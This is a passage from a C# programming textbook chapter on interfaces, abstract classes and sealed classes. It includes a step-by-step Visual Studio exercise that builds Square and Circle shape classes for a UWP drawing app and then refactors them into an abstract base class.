you never specify an access modifier (public, private, or protected).
Additionally, the methods in an interface have no implementation; they are
simply declarations, and all types that implement the interface must provide
their own implementations. Consequently, you replace the method body with
a semicolon. Here is an example:
interface IComparable
{
int CompareTo(object obj);
}
Tip The Microsoft .NET Framework documentation recommends that
you preface the name of your interfaces with the capital letter I. This
convention is the last vestige of Hungarian notation in C#. Incidentally,
the System namespace already defines the IComparable interface as just
shown.
An interface cannot contain any data; you cannot add fields (not even
private ones) to an interface.
Implementing an interface
To implement an interface, you declare a class or structure that inherits from
the interface and that implements all the methods specified by the interface.
This is not really inheritance as such, although the syntax is the same and
some of the semantics that you will see later in this chapter bear many of the
hallmarks of inheritance. You should note that unlike class inheritance, a
struct can implement an interface.
For example, suppose that you are defining the Mammal hierarchy
described in Chapter 12, but you need to specify that land-bound mammals
provide a method named NumberOfLegs that returns as an int the number of
legs that a mammal has. (Sea-bound mammals do not implement this
interface.) You could define the ILandBound interface that contains this
method as follows:
interface ILandBound
{
int NumberOfLegs();
}
You could then implement this interface in the Horse class. You inherit
from the interface and provide an implementation of every method defined by
the interface (in this case, there is just the one method, NumberOfLegs).
class Horse : ILandBound
{
...
public int NumberOfLegs()
{
return 4;
}
}
When you implement an interface, you must ensure that each method
matches its corresponding interface method exactly, according to the
following rules (a sketch follows this list):
The method names and return types match exactly.
Any parameters (including ref and out keyword modifiers) match
exactly.
All methods implementing an interface must be publicly accessible.
However, if you are using an explicit interface implementation, the
method should not have an access qualifier.
If there is any difference between the interface definition and its declared
implementation, the class will not compile.
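For example, taking the ILandBound interface from earlier in this chapter, each of the commented-out methods in this sketch breaks one of the rules if considered on its own:
class Horse : ILandBound
{
    // long NumberOfLegs() { return 4; }            // wrong return type: does not satisfy ILandBound
    // public int NumberOfLegs(int n) { return n; } // wrong parameter list: does not satisfy ILandBound
    // int NumberOfLegs() { return 4; }             // not public: cannot implicitly implement ILandBound

    public int NumberOfLegs() // matches the interface method exactly
    {
        return 4;
    }
}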
Tip The Microsoft Visual Studio integrated development environment
(IDE) can help reduce coding errors caused by failing to implement the
methods in an interface. The Implement Interface Wizard can generate
stubs for each item in an interface that a class implements. You then fill
in these stubs with the appropriate code. You will see how to use this
wizard in the exercises later in this chapter.
A class can inherit from another class and implement an interface at the
same time. In this case, C# does not distinguish between the base class and
the interface by using specific keywords as, for example, Java does. Instead,
C# uses a positional notation. The base class is always named first, followed
by a comma, followed by the interface. The following example defines Horse
as a class that is a Mammal but that additionally implements the ILandBound
interface:
interface ILandBound
{
...
}
class Mammal
{
...
}
class Horse : Mammal , ILandBound
{
...
}
Note An interface, InterfaceA, can inherit from another interface,
InterfaceB. Technically, this is known as interface extension rather than
inheritance. In this case, any class or struct that implements InterfaceA
must provide implementations of all the methods in InterfaceB and
InterfaceA.
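For example, in this sketch the hypothetical IFarmAnimal interface extends ILandBound, so a class implementing IFarmAnimal must provide the methods of both interfaces:
interface IFarmAnimal : ILandBound
{
    string FieldLocation();
}
class Sheep : IFarmAnimal
{
    public int NumberOfLegs() // required by ILandBound
    {
        return 4;
    }

    public string FieldLocation() // required by IFarmAnimal
    {
        return "North meadow";
    }
}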
Referencing a class through its interface
In the same way that you can reference an object by using a variable defined
as a class that is higher up the hierarchy, you can reference an object by using
a variable defined as an interface that the object’s class implements. Taking
the preceding example, you can reference a Horse object by using an
ILandBound variable, as follows:
Horse myHorse = new Horse(...);
ILandBound iMyHorse = myHorse; // legal
This works because all horses are land-bound mammals, although the
converse is not true—you cannot assign an ILandBound object to a Horse
variable without casting it first to verify that it does actually reference a
Horse object and not some other class that also happens to implement the
ILandBound interface.
The technique of referencing an object through an interface is useful
because you can use it to define methods that can take different types as
parameters, as long as the types implement a specified interface. For
example, the FindLandSpeed method shown here can take any argument that
implements the ILandBound interface:
int FindLandSpeed(ILandBound landBoundMammal)
{
...
}
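For example, because the Horse class implements the ILandBound interface, you can pass a Horse object directly:
Horse myHorse = new Horse(...);
int horseSpeed = FindLandSpeed(myHorse); // legal: Horse implements ILandBound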
You can verify that an object is an instance of a class that implements a
specific interface by using the is operator, which is demonstrated in Chapter
8, “Understanding values and references.” You use the is operator to
determine whether an object has a specified type, and it works with interfaces
as well as with classes and structs. For example, the following block of code
checks that the variable myHorse actually implements the ILandBound
interface before attempting to assign it to an ILandBound variable:
if (myHorse is ILandBound)
{
ILandBound iLandBoundAnimal = myHorse;
}
Note that when referencing an object through an interface, you can invoke
only methods that are visible through the interface.
Working with multiple interfaces
A class can have at most one base class, but it is allowed to implement an
unlimited number of interfaces. A class must implement all the methods
declared by these interfaces.
If a structure or class implements more than one interface, you specify the
interfaces as a comma-separated list. If a class also has a base class, the
interfaces are listed after the base class. For example, suppose that you define
another interface named IGrazable that contains the ChewGrass method for
all grazing animals. You can define the Horse class like this:
class Horse : Mammal, ILandBound, IGrazable
{
...
}
Explicitly implementing an interface
The examples so far have shown classes that implicitly implement an
interface. If you revisit the ILandBound interface and the Horse class (shown
next), you’ll see that although the Horse class implements from the
ILandBound interface, nothing in the implementation of the NumberOfLegs
method in the Horse class says that it is part of the ILandBound interface:
interface ILandBound
{
int NumberOfLegs();
}
class Horse : ILandBound
{
...
public int NumberOfLegs()
{
return 4;
}
}
This might not be an issue in a simple situation, but suppose the Horse
class implemented multiple interfaces. There is nothing to prevent multiple
interfaces from specifying a method with the same name, although they
might have different semantics. For example, suppose that you wanted to
implement a transportation system based on horse-drawn coaches. A lengthy
journey might be broken down into several stages, or “legs.” If you wanted to
keep track of how many legs each horse had pulled the coach for, you might
define the following interface:
interface IJourney
{
int NumberOfLegs();
}
Now, if you implement this interface in the Horse class, you have an
interesting problem:
class Horse : ILandBound, IJourney
{
...
public int NumberOfLegs()
{
return 4;
}
}
This is legal code, but does the horse have four legs or has it pulled the
coach for four legs of the journey? The answer as far as C# is concerned is
both of these! By default, C# does not distinguish which interface the method
is implementing, so the same method actually implements both interfaces.
To solve this problem and disambiguate which method is part of which
interface implementation, you can implement interfaces explicitly. To do this,
you specify which interface a method belongs to when you implement it, like
this:
class Horse : ILandBound, IJourney
{
...
int ILandBound.NumberOfLegs()
{
return 4;
}
int IJourney.NumberOfLegs()
{
return 3;
}
}
Now you can see that the horse has four legs and has pulled the coach for
three legs of the journey.
Apart from prefixing the name of the method with the interface name,
there is one other subtle difference in this syntax: the methods are not marked
public. You cannot specify the protection for methods that are part of an
explicit interface implementation. This leads to another interesting
phenomenon. If you create a Horse variable in the code, you cannot actually
invoke either of the NumberOfLegs methods because they are not visible. As
far as the Horse class is concerned, they are both private. In fact, this makes
sense. If the methods were visible through the Horse class, which method
would the following code actually invoke, the one for the ILandBound
interface or the one for the IJourney interface?
Horse horse = new Horse();
...
// The following statement will not compile
int legs = horse.NumberOfLegs();
So, how do you access these methods? The answer is that you reference
the Horse object through the appropriate interface, like this:
Horse horse = new Horse();
...
IJourney journeyHorse = horse;
int legsInJourney = journeyHorse.NumberOfLegs();
ILandBound landBoundHorse = horse;
int legsOnHorse = landBoundHorse.NumberOfLegs();
I recommend explicitly implementing interfaces when possible.
Interface restrictions
The essential idea to remember is that an interface never contains any
implementation. The following restrictions are natural consequences of this
(a sketch follows the list):
You’re not allowed to define any fields in an interface, not even static
fields. A field is an implementation detail of a class or structure.
You’re not allowed to define any constructors in an interface. A
constructor is also considered to be an implementation detail of a class
or structure.
You’re not allowed to define a destructor in an interface. A destructor
contains the statements used to destroy an object instance. (Destructors
are described in Chapter 14, “Using garbage collection and resource
management.”)
You cannot specify an access modifier for any method. All methods in
an interface are implicitly public.
You cannot nest any types (such as enumerations, structures, classes, or
interfaces) inside an interface.
An interface is not allowed to inherit from a structure or a class,
although an interface can inherit from another interface. Structures and
classes contain implementation; if an interface were allowed to inherit
from either, it would be inheriting some implementation.
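The following sketch summarizes several of these restrictions; under the version of C# used in this book, each commented-out declaration is a compile-time error (the member names are illustrative):
interface ILandBound
{
    // int legs;               // error: no fields allowed in an interface
    // ILandBound();           // error: no constructors allowed
    // public int CountLegs(); // error: no access modifiers allowed

    int NumberOfLegs();        // OK: implicitly public, declaration only
}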
Defining and using interfaces
In the following exercises, you will define and implement interfaces that
constitute part of a simple graphical drawing package. You will define two
interfaces, called IDraw and IColor, and then you will define classes that
implement them. Each class will define a shape that can be drawn on a
canvas on a form. (A canvas is a control that you can use to draw lines, text,
and shapes on the screen.)
The IDraw interface defines the following methods:
SetLocation With this method, you can specify the position as x- and
y-coordinates of the shape on the canvas.
Draw This method actually draws the shape on the canvas at the
location specified by using the SetLocation method.
The IColor interface defines the following method:
SetColor You use this method to specify the color of the shape.
When the shape is drawn on the canvas, it will appear in this color.
Define the IDraw and IColor interfaces
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Drawing solution, which is located in the \Microsoft
Press\VCSBS\Chapter 13\Drawing folder in your Documents folder.
The Drawing project is a graphical application. It contains a form called
DrawingPad. This form contains a canvas control called
drawingCanvas. You will use this form and canvas to test your code.
3. In Solution Explorer, click the Drawing project. On the Project menu,
click Add New Item.
The Add New Item—Drawing dialog box opens.
4. In the left pane of the Add New Item—Drawing dialog box, click Visual
C#, and then click Code. In the middle pane, click the Interface
template. In the Name box, type IDraw.cs, and then click Add.
Visual Studio creates the IDraw.cs file and adds it to your project. The
IDraw.cs file appears in the Code and Text Editor window, and should
look like this:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Drawing
{
interface IDraw
{
}
}
5. In the IDraw.cs file, add the following using directive to the list at the
top of the file:
using Windows.UI.Xaml.Controls;
You will reference the Canvas class in this interface. The Canvas class
is located in the Windows.UI.Xaml.Controls namespace for Universal
Windows Platform (UWP) apps.
6. Add the methods shown here in bold to the IDraw interface:
interface IDraw
{
void SetLocation(int xCoord, int yCoord);
void Draw(Canvas canvas);
}
7. On the Project menu, click Add New Item again.
8. In the Add New Item—Drawing dialog box, in the middle pane, click
the Interface template. In the Name box, type IColor.cs, and then click
Add.
Visual Studio creates the IColor.cs file and adds it to your project. The
IColor.cs file appears in the Code and Text Editor window.
9. In the IColor.cs file, at the top of the file, add the following using
directive to the list:
using Windows.UI;
You will reference the Color class in this interface, which is located in
the Windows.UI namespace for UWP apps.
10. Add the following method shown in bold to the IColor interface
definition:
interface IColor
{
void SetColor(Color color);
}
You have now defined the IDraw and IColor interfaces. The next step is
to create some classes that implement them. In the following exercise, you
will create two new shape classes, called Square and Circle. These classes
will implement both interfaces.
Create the Square and Circle classes, and implement the interfaces
1. On the Project menu, click Add Class.
2. In the Add New Item—Drawing dialog box, in the middle pane, verify
that the Class template is selected. In the Name box, type Square.cs,
and then click Add.
Visual Studio creates the Square.cs file and displays it in the Code and
Text Editor window.
3. At the top of the Square.cs file, add the following using directives to the
list:
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
4. Modify the definition of the Square class so that it implements the
IDraw and IColor interfaces, as shown here in bold:
class Square: IDraw, IColor
{
}
5. Add the following private variables shown in bold to the Square class:
class Square : IDraw, IColor
{
private int sideLength;
private int locX = 0, locY = 0;
private Rectangle rect = null;
}
These variables will hold the position and size of the Square object on
the canvas. The Rectangle class is located in the
Windows.UI.Xaml.Shapes namespace for UWP apps. You will use this
class to draw the square.
6. Add the following constructor shown in bold to the Square class:
class Square : IDraw, IColor
{
...
public Square(int sideLength)
{
this.sideLength = sideLength;
}
}
This constructor initializes the sideLength field and specifies the length
of each side of the square.
7. In the definition of the Square class, hover over the IDraw interface. On
the lightbulb context menu that appears, click Implement Interface
Explicitly, as shown in the following image:
This feature causes Visual Studio to generate default implementations of
the methods in the IDraw interface. You can also add the methods to the
Square class manually if you prefer. The following example shows the
code generated by Visual Studio:
void IDraw.Draw(Canvas canvas)
{
throw new NotImplementedException();
}
void IDraw.SetLocation(int xCoord, int yCoord)
{
throw new NotImplementedException();
}
Each of these methods currently throws a NotImplementedException
exception. You are expected to replace the body of these methods with
your own code.
8. In the IDraw.SetLocation method, replace the existing code that throws
a NotImplementedException exception with the following statements
shown in bold:
void IDraw.SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
This code stores the values passed in through the parameters in the locX
and locY fields in the Square object.
9. Replace the exception code generated in the IDraw.Draw method with
the statements shown here in bold:
void IDraw.Draw(Canvas canvas)
{
if (this.rect != null)
{
canvas.Children.Remove(this.rect);
}
else
{
this.rect = new Rectangle();
}
this.rect.Height = this.sideLength;
this.rect.Width = this.sideLength;
Canvas.SetTop(this.rect, this.locY);
Canvas.SetLeft(this.rect, this.locX);
canvas.Children.Add(this.rect);
}
This method renders the Square object by drawing a Rectangle shape on
the canvas. (A square is simply a rectangle for which all four sides have
the same length.) If the Rectangle has been drawn previously (possibly
at a different location and with a different color), it is removed from the
canvas. The height and width of the Rectangle are set by using the value
of the sideLength field. The position of the Rectangle on the canvas is
set by using the static SetTop and SetLeft methods of the Canvas class,
and then the Rectangle is added to the canvas. (This causes it to be
displayed.)
10. Add the SetColor method from the IColor interface to the Square class,
as shown here:
void IColor.SetColor(Color color)
{
if (this.rect != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this.rect.Fill = brush;
}
}
This method checks that the Square object has actually been displayed.
(The rect field will be null if it has not yet been rendered.) The code sets
the Fill property of the rect field with the specified color by using a
SolidColorBrush object. (The details of how the SolidColorBrush class
works are beyond the scope of this discussion.)
11. On the Project menu, click Add Class. In the Add New Item – Drawing
dialog box, in the Name box, type Circle.cs, and then click Add.
Visual Studio creates the Circle.cs file and displays it in the Code and
Text Editor window.
12. At the top of the Circle.cs file, add the following using directives to the
list:
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
13. Modify the definition of the Circle class so that it implements the IDraw
and IColor interfaces as shown here in bold:
class Circle : IDraw, IColor
{
}
14. Add the following private variables shown in bold to the Circle class:
class Circle : IDraw, IColor
{
private int diameter;
private int locX = 0, locY = 0;
private Ellipse circle = null;
}
These variables will hold the position and size of the Circle object on
the canvas. The Ellipse class provides the functionality that you will use
to draw the circle.
15. Add the constructor shown here in bold to the Circle class:
class Circle : IDraw, IColor
{
...
public Circle(int diameter)
{
this.diameter = diameter;
}
}
This constructor initializes the diameter field.
16. Add the following SetLocation method from the IDraw interface to the
Circle class:
void IDraw.SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
Note This method is the same as that in the Square class. You will
see how you refactor the code to avoid this repetition later in the
chapter.
17. Add the Draw method shown here to the Circle class:
void IDraw.Draw(Canvas canvas)
{
if (this.circle != null)
{
canvas.Children.Remove(this.circle);
}
else
{
this.circle = new Ellipse();
}
this.circle.Height = this.diameter;
this.circle.Width = this.diameter;
Canvas.SetTop(this.circle, this.locY);
Canvas.SetLeft(this.circle, this.locX);
canvas.Children.Add(this.circle);
}
This method is also part of the IDraw interface. It is similar to (but not
the same as) the Draw method in the Square class, except that it renders the
Circle object by drawing an Ellipse shape on the canvas. (A circle is an
ellipse for which the width and height are the same.) As with the
SetLocation method, you will see how to refactor this code to reduce any
repetition later in this chapter.
18. Add the following SetColor method to the Circle class:
void IColor.SetColor(Color color)
{
if (this.circle != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this.circle.Fill = brush;
}
}
This method is part of the IColor interface. As before, this method is
similar to that of the Square class.
You have completed the Square and Circle classes. You can now use the
form to test them.
Test the Square and Circle classes
1. Display the DrawingPad.xaml file in the Design View window.
2. On the form, click the large shaded area.
The shaded area of the form is the Canvas object. Clicking on this area
sets the focus to this object.
3. In the Properties window, click the Event Handlers button. (This button has
an icon that looks like a bolt of lightning.)
4. In the list of events, locate the Tapped event, and then double-click in
the Tapped text box.
Visual Studio creates a method called drawingCanvas_Tapped for the
DrawingPad class and displays it in the Code and Text Editor window.
This is an event handler that runs when the user taps the canvas with a
finger or clicks the left mouse button over the canvas. You can learn
more about event handlers in Chapter 20, “Decoupling application logic
and handling events.”
5. At the top of the DrawingPad.xaml.cs file, add the following using
directive to the list:
using Windows.UI;
The Windows.UI namespace contains the definition of the Colors class,
which you will use when you set the color of a shape as it is drawn.
6. Add the following code shown in bold to the drawingCanvas_Tapped
method:
private void drawingCanvas_Tapped(object sender,
TappedRoutedEventArgs e)
{
Point mouseLocation = e.GetPosition(this.drawingCanvas);
Square mySquare = new Square(100);
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.SetLocation((int)mouseLocation.X,
(int)mouseLocation.Y);
drawSquare.Draw(drawingCanvas);
}
}
The TappedRoutedEventArgs parameter to this method provides useful
information about the position of the mouse. In particular, the
GetPosition method returns a Point structure that contains the x- and y-
coordinates of the mouse. The code that you have added creates a new
Square object. It then checks to verify that this object implements the
IDraw interface (this is good practice and helps to ensure that your code
will not fail at runtime if you attempt to reference an object through an
interface that it does not implement) and creates a reference to the object
by using this interface. Remember that when you explicitly implement
an interface, the methods defined by the interface are available only by
creating a reference to that interface. (The SetLocation and Draw
methods are private to the Square class and are available only through
the IDraw interface.) The code then sets the location of the Square to the
position of the user’s finger or mouse. Note that the x- and y-coordinates
in the Point structure are actually double values, so this code casts them
to ints. The code then calls the Draw method to display the Square
object.
7. At the end of the drawingCanvas_Tapped method, add the following
code shown in bold:
private void drawingCanvas_Tapped(object sender,
TappedRoutedEventArgs e)
{
...
if (mySquare is IColor)
{
IColor colorSquare = mySquare;
colorSquare.SetColor(Colors.BlueViolet);
}
}
This code tests the Square class to verify that it implements the IColor
interface; if it does, the code creates a reference to the Square class
through this interface and calls the SetColor method to set the color of
the Square object to Colors.BlueViolet.
Important You must call Draw before you call SetColor because
the SetColor method sets the color of the Square only if it has
already been rendered. If you invoke SetColor before Draw, the
color will not be set, and the Square object will not appear.
8. Return to the DrawingPad.xaml file in the Design View window and
then click the Canvas object.
9. In the list of events, locate the RightTapped event, and then double-click
the RightTapped text box.
This event occurs when the user taps, holds, and then releases from the
canvas by using his or her finger or clicks the right mouse button on the
canvas.
10. Add the following code shown below in bold to the
drawingCanvas_RightTapped method:
private void drawingCanvas_RightTapped(object sender,
RightTappedRoutedEventArgs e)
{
Point mouseLocation = e.GetPosition(this.drawingCanvas);
Circle myCircle = new Circle(100);
if (myCircle is IDraw)
{
IDraw drawCircle = myCircle;
drawCircle.SetLocation((int)mouseLocation.X,
(int)mouseLocation.Y);
drawCircle.Draw(drawingCanvas);
}
if (myCircle is IColor)
{
IColor colorCircle = myCircle;
colorCircle.SetColor(Colors.HotPink);
}
}
The logic in this code is similar to the logic in the
drawingCanvas_Tapped method, except that this code draws and fills a
circle rather than a square.
11. On the Debug menu, click Start Debugging to build and run the
application.
12. When the Drawing Pad window opens, tap or click anywhere on the
canvas displayed in the window. A violet square should appear.
13. Tap, hold, and release, or right-click anywhere on the canvas. A pink
circle should appear. You can click the left and right mouse buttons any
number of times; each click will draw a square or circle at the mouse
position.
14. Return to Visual Studio and stop debugging.
Abstract classes
You can implement the ILandBound and IGrazable interfaces discussed
before the previous set of exercises in many different classes, depending on
how many different types of mammals you want to model in your C#
application. In situations such as this, it’s quite common for parts of the
derived classes to share common implementations. For example, the
duplication in the following two classes is obvious:
class Horse : Mammal, ILandBound, IGrazable
{
...
void IGrazable.ChewGrass()
{
Console.WriteLine( "Chewing grass ");
// code for chewing grass
}
}
class Sheep : Mammal, ILandBound, IGrazable
{
...
void IGrazable.ChewGrass()
{
Console.WriteLine( "Chewing grass ");
// same code as horse for chewing grass
}
}
Duplication in code is a warning sign. If possible, you should refactor the
code to avoid duplication and reduce any associated maintenance costs. One
way to achieve this refactoring is to put the common implementation into a
new class created specifically for this purpose. In effect, you can insert a new
class into the class hierarchy, as shown by the following code example:
class GrazingMammal : Mammal, IGrazable
{
...
void IGrazable.ChewGrass()
{
// common code for chewing grass
Console.WriteLine( "Chewing grass ");
}
}
class Horse : GrazingMammal, ILandBound
{
...
}
class Sheep : GrazingMammal, ILandBound
{
...
}
This is a good solution, but there is one thing that is still not quite right:
you can actually create instances of the GrazingMammal class (and the
Mammal class, for that matter). This doesn’t really make sense. The
GrazingMammal class exists to provide a common default implementation.
Its sole purpose is to be a class from which to inherit. The GrazingMammal
class is an abstraction of common functionality rather than an entity in its
own right.
To declare that creating instances of a class is not allowed, you can
declare that the class is abstract by using the abstract keyword, such as in the
following example:
abstract class GrazingMammal : Mammal, IGrazable
{
...
}
If you now try to instantiate a GrazingMammal object, the code will not
compile:
GrazingMammal myGrazingMammal = new GrazingMammal(...); // illegal
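Although you cannot instantiate an abstract class, you can still declare
variables of the abstract type and point them at instances of concrete
derived classes. A brief sketch (assuming, purely for illustration, that
Horse has a parameterless constructor):

GrazingMammal myMammal = new Horse(); // legal: Horse is a concrete class

// Explicitly implemented interface methods are still reached through
// a reference of the interface type:
IGrazable grazer = myMammal;
grazer.ChewGrass();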
Abstract methods
An abstract class can contain abstract methods. An abstract method is similar
in principle to a virtual method (covered in Chapter 12), except that it does
not contain a method body. A derived class must override this method. An
abstract method cannot be private. The following example defines the
DigestGrass method in the GrazingMammal class as an abstract method;
grazing mammals might use the same code for chewing grass, but they must
provide their own implementation of the DigestGrass method. An abstract
method is useful if it does not make sense to provide a default
implementation in the abstract class, but you want to ensure that an inheriting
class provides its own implementation of that method.
abstract class GrazingMammal : Mammal, IGrazable
{
public abstract void DigestGrass();
...
}
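A derived class then provides its own implementation by using the override
keyword. For example, the Horse class might implement DigestGrass as follows
(other members elided):

class Horse : GrazingMammal, ILandBound
{
    ...
    public override void DigestGrass()
    {
        // horse-specific code for digesting grass
        Console.WriteLine("Horse digesting grass");
    }
}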
Sealed classes
Using inheritance is not always easy and requires forethought. If you create
an interface or an abstract class, you are knowingly writing something that
will be inherited from in the future. The trouble is that predicting the future is
a difficult business. With practice and experience, you can develop the skills
to craft a flexible, easy-to-use hierarchy of interfaces, abstract classes, and
classes, but it takes effort, and you also need a solid understanding of the
problem that you are modeling. To put it another way, unless you consciously
design a class with the intention of using it as a base class, it’s extremely
unlikely that it will function well as a base class. With C#, you can use the
sealed keyword to prevent a class from being used as a base class if you
decide that it should not be. For example:
sealed class Horse : GrazingMammal, ILandBound
{
...
}
If any class attempts to use Horse as a base class, a compile-time error
will be generated. Note that a sealed class cannot declare any virtual methods
and that an abstract class cannot be sealed.
Sealed methods
You can also use the sealed keyword to declare that an individual method in
an unsealed class is sealed. This means that a derived class cannot override
this method. You can seal only a method declared with the override keyword,
and you declare the method as sealed override. You can think of the
interface, virtual, override, and sealed keywords as follows:
An interface introduces the name of a method.
A virtual method is the first implementation of a method.
An override method is another implementation of a method.
A sealed method is the last implementation of a method.
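The following sketch illustrates this progression by using hypothetical
types (only the Draw method is shown at each stage):

interface IRender
{
    void Draw();                               // introduces the name of the method
}

class Renderer : IRender
{
    public virtual void Draw() { ... }         // the first implementation
}

class FancyRenderer : Renderer
{
    public override void Draw() { ... }        // another implementation
}

class FinalRenderer : FancyRenderer
{
    public sealed override void Draw() { ... } // the last implementation
}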
Implementing and using an abstract class
The following exercises use an abstract class to rationalize some of the code
that you developed in the previous exercise. The Square and Circle classes
contain a high proportion of duplicate code. It makes sense to factor this code
into an abstract class called DrawingShape because this will help to ease
maintenance of the Square and Circle classes in the future.
Create the DrawingShape abstract class
1. Return to the Drawing project in Visual Studio.
Note A finished working copy of the previous exercise is available
in the Drawing project, which is located in the \Microsoft
Press\VCSBS\Chapter 13\Drawing - Complete folder in your
Documents folder.
2. In Solution Explorer, click the Drawing project in the Drawing solution.
On the Project menu, click Add Class.
The Add New Item—Drawing dialog box opens.
3. In the Name box, type DrawingShape.cs, and then click Add.
Visual Studio creates the class and displays it in the Code and Text
Editor window.
4. In the DrawingShape.cs file, in the list at the top of the file, add the
following using directives:
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
The purpose of this class is to contain the code common to the Circle
and Square classes. A program should not be able to instantiate a
DrawingShape object directly.
5. Modify the definition of the DrawingShape class to declare it as
abstract, as shown here in bold:
abstract class DrawingShape
{
}
6. Add the following protected variables shown in bold to the DrawingShape
class:
abstract class DrawingShape
{
protected int size;
protected int locX = 0, locY = 0;
protected Shape shape = null;
}
The Square and Circle classes both use the locX and locY fields to
specify the location of the object on the canvas so that you can move
these fields to the abstract class. Similarly, the Square and Circle classes
both use a field to indicate the size of the object when it was rendered;
although it has a different name in each class (sideLength and diameter),
semantically the field performs the same task in both classes. The name
size is a good abstraction of the purpose of this field.
Internally, the Square class uses a Rectangle object to render itself on
the canvas, and the Circle class uses an Ellipse object. Both of these
classes are part of a hierarchy based on the abstract Shape class in the
.NET Framework. The DrawingShape class uses a Shape field to
represent both of these types.
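In other words, because Rectangle and Ellipse both ultimately derive from
Shape, a single Shape variable can refer to either kind of object:

Shape shape = new Rectangle(); // a Shape reference can hold a Rectangle ...
shape = new Ellipse();         // ... or an Ellipse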
7. Add the following constructor to the DrawingShape class:
abstract class DrawingShape
{
...
public DrawingShape(int size)
{
this.size = size;
}
}
This code initializes the size field in the DrawingShape object.
8. Add the SetLocation and SetColor methods to the DrawingShape class,
as shown in bold in the code that follows. These methods provide
implementations that are inherited by all classes that derive from the
DrawingShape class. Notice that they are not marked as virtual, and a
derived class is not expected to override them. Also, the DrawingShape
class is not declared as implementing the IDraw or IColor interfaces
(interface implementation is a feature of the Square and Circle classes
and not this abstract class), so these methods are simply declared as
public.
abstract class DrawingShape
{
...
public void SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
public void SetColor(Color color)
{
if (this.shape != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this.shape.Fill = brush;
}
}
}
9. Add the Draw method to the DrawingShape class. Unlike the previous
methods, this method is declared as virtual, and any derived classes are
expected to override it to extend the functionality. The code in this
method verifies that the shape field is not null and then draws it on the
canvas. The classes that inherit this method must provide their own code
to instantiate the shape object. (Remember that the Square class creates
a Rectangle object and the Circle class creates an Ellipse object.)
abstract class DrawingShape
{
...
public virtual void Draw(Canvas canvas)
{
if (this.shape == null)
{
throw new InvalidOperationException("Shape is null");
}
this.shape.Height = this.size;
this.shape.Width = this.size;
Canvas.SetTop(this.shape, this.locY);
Canvas.SetLeft(this.shape, this.locX);
canvas.Children.Add(this.shape);
}
}
You have now completed the DrawingShape abstract class. The next steps
are to change the Square and Circle classes so that they inherit from this class
and then to remove the duplicated code from the Square and Circle classes.
Modify the Square and Circle classes to inherit from the DrawingShape
class
1. Display the code for the Square class in the Code and Text Editor
window.
2. Modify the definition of the Square class so that it inherits from the
DrawingShape class in addition to implementing the IDraw and IColor
interfaces.
class Square : DrawingShape, IDraw, IColor
{
...
}
Notice that you must specify the class that the Square class inherits from
before any interfaces that it implements.
3. In the Square class, remove the definitions of the sideLength, rect, locX,
and locY fields. These fields are no longer necessary because they are
now provided by the DrawingShape class.
4. Replace the existing constructor with the following code shown in bold,
which calls the constructor in the base class:
class Square : DrawingShape, IDraw, IColor
{
public Square(int sideLength)
:base(sideLength)
{
}
...
}
Notice that the body of this constructor is empty because the base class
constructor performs all the initialization required.
5. Remove the IDraw.SetLocation and IColor.SetColor methods from the
Square class. The DrawingShape class provides the implementation of
these methods.
6. Modify the definition of the Draw method. Declare it with public
override and also remove the reference to the IDraw interface. Again,
the DrawingShape class already provides the base functionality for this
method, but you will extend it with the specific code required by the
Square class.
public override void Draw(Canvas canvas)
{
...
}
7. Replace the body of the Draw method with the code shown here in bold:
public override void Draw(Canvas canvas)
{
if (this.shape != null)
{
canvas.Children.Remove(this.shape);
}
else
{
this.shape = new Rectangle();
}
base.Draw(canvas);
}
These statements instantiate the shape field inherited from the
DrawingShape class as a new instance of the Rectangle class if it has not
already been instantiated. They then call the Draw method in the
DrawingShape class.
8. Repeat steps 2 through 7 for the Circle class, except that the constructor
should be called Circle with a parameter called diameter, and in the
Draw method, you should instantiate the shape field as a new Ellipse
object. The complete code for the Circle class should look like this:
class Circle : DrawingShape, IDraw, IColor
{
public Circle(int diameter)
:base(diameter)
{
}
public override void Draw(Canvas canvas)
{
if (this.shape != null)
{
canvas.Children.Remove(this.shape);
}
else
{
this.shape = new Ellipse();
}
base.Draw(canvas);
}
}
9. On the Debug menu, click Start Debugging. When the Drawing Pad
window opens, verify that Square objects appear when you left-click in
the window, and Circle objects appear when you right-click in the
window. The application should behave the same as before.
10. Return to Visual Studio and stop debugging.
Compatibility with the Windows Runtime revisited
Chapter 9, “Creating value types with enumerations and structures,”
describes how the Windows platform from Windows 8 onward
implements the Windows Runtime (WinRT) as a layer on top of the
native Windows APIs, providing a simplified programming interface
for developers building unmanaged applications. (An unmanaged
application is an application that does not run by using the .NET
Framework; you build them by using a language such as C++ rather
than C#). Managed applications use the common language runtime
(CLR) to run .NET Framework applications. The .NET Framework
provides an extensive set of libraries and features. On Windows 7 and
earlier versions, the CLR implements these features by using the native
Windows APIs. If you are building desktop or enterprise applications
and services on Windows 10, this same feature set is still available
(although the .NET Framework itself has been upgraded to version
4.6.1), and any C# applications that work on Windows 7 should run
unchanged on Windows 10.
On Windows 10, UWP apps always run by using WinRT. This
means that if you are building UWP apps by using a managed language
such as C#, the CLR actually invokes WinRT rather than the native
Windows APIs. Microsoft has provided a mapping layer between the
CLR and WinRT that can transparently translate requests to create
objects and invoke methods that are made to the .NET Framework into
the equivalent object requests and method calls in WinRT. For example,
when you create a .NET Framework Int32 value (an int in C#), this
code is translated to create a value using the equivalent WinRT data
type. However, although the CLR and WinRT have a large amount of
overlapping functionality, not all the features of the .NET Framework
4.6 have corresponding features in WinRT. Consequently, UWP apps
have access to only a reduced subset of the types and methods provided
by the .NET Framework 4.6. (IntelliSense in Visual Studio 2017
automatically shows the restricted view of available features when you
use C# to build UWP apps, omitting the types and methods not
available through WinRT.)
